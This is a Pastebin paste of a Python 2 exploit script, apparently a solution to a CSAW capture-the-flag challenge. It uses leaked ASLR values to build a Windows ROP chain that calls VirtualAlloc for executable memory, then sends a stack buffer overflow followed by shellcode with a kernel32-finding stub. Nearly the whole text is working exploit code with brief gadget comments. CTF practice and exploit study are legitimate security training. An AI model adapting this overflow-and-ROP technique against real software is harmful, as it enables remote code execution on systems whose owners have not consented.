Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import sys, socket, struct, re
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- #s.connect(("54.164.253.42", 9998))
- s.connect(("127.0.0.1", 9998))
- print s.recv(1024)
- #raw_input()
- s.send("GreenhornSecretPassword!!!\n")
- print s.recv(1024)
- print s.recv(1024)
- s.send("A\n")
- print s.recv(1024)
- aslr_text = s.recv(1024)
- print aslr_text
- slide = eval(aslr_text[aslr_text.find("slide is: ")+10:aslr_text.find("slide is: ")+20])
- slide += 0x00400000
- stack = eval(aslr_text[aslr_text.find("stored at: ")+11:aslr_text.find("stored at: ")+21])
- s.send("V\n")
- print s.recv(1024)
- #addr = 0x00D81210
- #addr = 0x01341210
- #addr = 0x90909090
- def fixaddr(addr):
- global slide
- orig_base = 0x00D80000
- return addr - orig_base + slide
- def padr(addr):
- return struct.pack("<I", fixaddr(addr))
- def pvar(val):
- return struct.pack("<I", val)
- getk32 = "\x31\xC0\x31\xD2\xB2\x30\x64\x8B\x02\x85\xC0\x78\xC0\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8D\x40\x3C"
- f = open("gnarlyshellcode", "rb")
- shellcode = f.read()
- f.close()
- shellcode = getk32 + shellcode
- shellcode += '\x90'
- ropstack = padr(0x00D811C0) #Calls virtual alloc
- ropstack += padr(0x00D81204) #VirtualAlloc ret addr, add esp 0Ch; mov eax, [ebp+8]; pop ebp; retn;
- #That ROP chain effectively doess add esp, 10h;
- ropstack += pvar(0x00000000) #lpAddress
- ropstack += pvar(0x00002048) #dwSize)
- ropstack += pvar(0x00000040) #PAGE_EXE_RW
- ropstack += pvar(stack-0x400)#where to store ret addr
- ropstack += padr(0x00D81DA6) #pop ecx; pop ebp; retn
- #we need to set ECX to a dereferenceable address so that the next ROP chain doesn't crash
- ropstack += pvar(stack-0x300)#ecx value
- ropstack += pvar(stack+0x0C) #ebp value
- ropstack += padr(0x00D811DD) #mov [ecx], eax; mov edx, [ebp+14h]; mov eax, [edx]; pop ebp; retn;
- #This ROP gadget lets me get the address of the allocated memory off of the stack
- #and into a register
- ropstack += pvar(stack+0x54) #ebp value
- ropstack += padr(0x00D81CE8) #mov [ebp-8], eax; lea eax, [ebp-10h]; mov large fs:0, eax; retn;
- #I used this rop chain twice to overwrite the parameters passed to ReadBytes
- #below
- ropstack += padr(0x00D811E2) #mov eax, [edx]; pop ebp; retn;
- ropstack += pvar(stack+0x58) #ebp value
- ropstack += padr(0x00D81CE8) #mov [ebp-8], eax; lea eax, [ebp-10h]; mov large fs:0, eax; retn;
- ropstack += padr(0x00D81600) #ReadBytes
- ropstack += pvar(stack-0x400) #ReadBytes return address(overwritten)
- ropstack += pvar(stack-0x400) #DestBuffer(overwritten)
- ropstack += pvar(len(shellcode))
- ropstack += pvar(0x000000090) #stop char
- prerop = ""
- prerop += padr(0x00D82000)*2 #Virtualalloc IAT
- prerop += pvar(stack+0x10) #stored EBP
- #s.settimeout(1)
- s.send("CSAW" + "\x90"*(0x400-len(prerop)) + prerop + ropstack + "\x0a")
- s.send(shellcode)
- print "The challenge server says: ", s.recv(1024)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
